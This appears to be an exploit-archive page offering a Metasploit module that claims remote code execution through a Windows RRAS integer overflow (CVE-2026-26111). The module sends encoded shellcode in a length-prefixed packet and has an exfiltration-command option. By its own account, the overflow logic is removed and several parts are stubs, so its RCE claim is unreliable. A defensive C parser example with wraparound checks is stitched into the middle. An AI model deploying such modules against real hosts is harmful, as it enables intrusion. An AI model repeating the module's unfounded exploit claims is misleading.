## https://sploitus.com/exploit?id=PACKETSTORM:218137
======================================================================================================================
| # Title : Windows RRAS Integer Overflow |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://microsoft.com |
======================================================================================================================
[+] Summary : This Metasploit module simulates a remote exploitation attempt against a hypothetical integer overflow vulnerability in Windows RRAS,
which could lead to a heap-based overflow and potential remote code execution.
The module establishes a TCP connection to the target, constructs a simplified RPC-like packet containing the encoded payload, and sends it to the service.
It includes configurable options such as target host, port, callback port, and an optional command parameter for the payload execution context.
The exploit logic is intentionally simplified: the unsafe or broken decoder and overflow mechanisms have been removed, and additional features such as exfiltration handling are stubbed out for safety and stability.
The module also includes a basic connectivity check stub and uses standard Metasploit payload handling (payload.encoded) to generate shellcode.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
##

class MetasploitModule < Msf::Exploit::Remote
  # Metasploit exposes ranking constants as *Ranking (e.g. GreatRanking);
  # the original Msf::Exploit::Rank::Great does not exist and fails to load.
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Windows RRAS Integer Overflow RCE (CVE-2026-26111)',
      'Description' => %q{
        This module simulates exploitation of an integer overflow in RRAS leading to heap overflow.
      },
      'License'     => MSF_LICENSE,
      'Author'      => [
        'indoushka'
      ],
      'References'  => [
        ['CVE', '2026-26111'],
        ['MSKB', 'KB5084597']
      ],
      'Platform'    => 'win',
      'Targets'     => [
        [ 'Windows 11 x64', { 'Arch' => ARCH_X64 } ]
      ],
      'DefaultOptions' => {
        'RPORT'    => 4444,
        'WfsDelay' => 30
      },
      'Payload'     => {
        'Space'    => 4096,
        'BadChars' => "\x00"
      },
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2026-03-22'
    ))

    # RHOST/RPORT are already registered by the Tcp mixin; RHOST is repeated here as in the original.
    register_options([
      Opt::RHOST(),
      OptPort.new('CALLBACK_PORT', [true, 'Callback port', 4445]),
      OptString.new('EXFIL_CMD', [true, 'Command', 'whoami'])
    ])
  end

  # Standard Metasploit payload handling: the framework encodes the selected payload.
  def generate_payload
    payload.encoded
  end

  # Simplified RPC-like packet: version 5.0, packet type 0x0b, four reserved bytes,
  # a 32-bit little-endian length field, then the payload bytes.
  def build_packet(shellcode)
    pkt = "\x05\x00"                       # version major/minor
    pkt << "\x0b"                          # packet type
    pkt << "\x00\x00\x00\x00"              # reserved
    pkt << [shellcode.length].pack('V')    # little-endian 32-bit length
    pkt << shellcode
    pkt
  end

  def exploit
    print_status("Connecting to target #{rhost}:#{rport}...")
    connect
    shellcode = generate_payload
    packet = build_packet(shellcode)
    print_status("Sending payload (#{packet.length} bytes)...")
    sock.put(packet)
    handler
    disconnect
  end

  # Stubbed out: the original exfiltration logic was removed for safety.
  def start_exfiltration_server
    print_status("Exfiltration feature disabled in corrected version (logic stub).")
  end

  # Connectivity check stub; no vulnerability detection is performed.
  def check
    print_status("Basic check not implemented (safe stub).")
    Exploit::CheckCode::Unknown
  end
end
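The module above builds a length-prefixed packet, and its name refers to an integer overflow in how a declared length is turned into an allocation size. The following added example (not part of the original advisory or module, and not a description of the real RRAS parser) shows the receiving side of that same packet layout written defensively: a parser that validates the header and the 32-bit length field against the bytes actually received before any allocation happens, next to the unchecked 32-bit size computation that wraps around. The header layout mirrors build_packet; the field names, the HDR_LEN/MAX_DATA_LEN constants and the sample packets are assumptions constructed for illustration.

```c
/* Added example: defensive parsing of the simplified packet layout used by the
 * module above (05 00 | 0b | 4 reserved bytes | u32 LE length | data).
 * Constants and field names are assumptions for illustration, not RRAS internals. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define HDR_LEN      11u      /* 2 (version) + 1 (type) + 4 (reserved) + 4 (length) */
#define MAX_DATA_LEN 65536u   /* assumed policy bound a service would accept */

/* Unchecked 32-bit size computation (CWE-190): a large declared length
 * wraps modulo 2^32 and yields a tiny allocation for a large copy. */
uint32_t unchecked_total_size(uint32_t declared_len) {
    return declared_len + HDR_LEN;
}

/* Checked version: rejects lengths above the policy bound or that would wrap. */
bool checked_total_size(uint32_t declared_len, uint32_t *out) {
    if (declared_len > MAX_DATA_LEN) return false;
    if (declared_len > UINT32_MAX - HDR_LEN) return false;   /* would wrap */
    *out = declared_len + HDR_LEN;
    return true;
}

static uint32_t read_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

enum parse_rc { PKT_OK = 0, PKT_TRUNCATED, PKT_BAD_HEADER, PKT_BAD_LENGTH };

/* Validates header and declared length against the bytes actually received.
 * On PKT_OK, *data/*data_len describe the payload region inside buf; nothing
 * is allocated or copied before these checks pass. */
enum parse_rc parse_packet(const uint8_t *buf, size_t buflen,
                           const uint8_t **data, uint32_t *data_len) {
    if (buflen < HDR_LEN) return PKT_TRUNCATED;
    if (buf[0] != 0x05 || buf[1] != 0x00 || buf[2] != 0x0b) return PKT_BAD_HEADER;

    uint32_t declared = read_le32(buf + 7);
    uint32_t total;
    if (!checked_total_size(declared, &total)) return PKT_BAD_LENGTH;
    /* declared length must not exceed what was actually received */
    if ((size_t)declared > buflen - HDR_LEN) return PKT_TRUNCATED;

    *data = buf + HDR_LEN;
    *data_len = declared;
    return PKT_OK;
}

/* Convenience wrapper returning only the result code. */
int classify(const uint8_t *buf, size_t buflen) {
    const uint8_t *d; uint32_t dl;
    return (int)parse_packet(buf, buflen, &d, &dl);
}

/* Constructed sample: well-formed packet carrying 4 data bytes. */
const uint8_t SAMPLE_OK[] = {0x05,0x00,0x0b, 0,0,0,0, 0x04,0,0,0, 'A','B','C','D'};
/* Constructed sample: declared length 0xFFFFFFFC, which wraps to 7 when
 * HDR_LEN is added without a check, but carries only 4 data bytes. */
const uint8_t SAMPLE_WRAP[] = {0x05,0x00,0x0b, 0,0,0,0, 0xfc,0xff,0xff,0xff, 'A','B','C','D'};
/* Constructed sample: declares 5 data bytes but only 4 follow. */
const uint8_t SAMPLE_SHORT[] = {0x05,0x00,0x0b, 0,0,0,0, 0x05,0,0,0, 'A','B','C','D'};

int main(void) {
    printf("unchecked size for 0xFFFFFFFC: %u (wrapped)\n", unchecked_total_size(0xFFFFFFFCu));
    printf("ok packet:    rc=%d\n", classify(SAMPLE_OK, sizeof SAMPLE_OK));
    printf("wrap packet:  rc=%d (PKT_BAD_LENGTH=%d)\n", classify(SAMPLE_WRAP, sizeof SAMPLE_WRAP), PKT_BAD_LENGTH);
    printf("short packet: rc=%d (PKT_TRUNCATED=%d)\n", classify(SAMPLE_SHORT, sizeof SAMPLE_SHORT), PKT_TRUNCATED);
    return 0;
}
```

The check order matters: the policy bound and wraparound test run on the declared value alone, and only then is the declared length compared with the received byte count, so a packet that lies about its length is rejected before any size arithmetic feeds an allocator or a copy.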
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================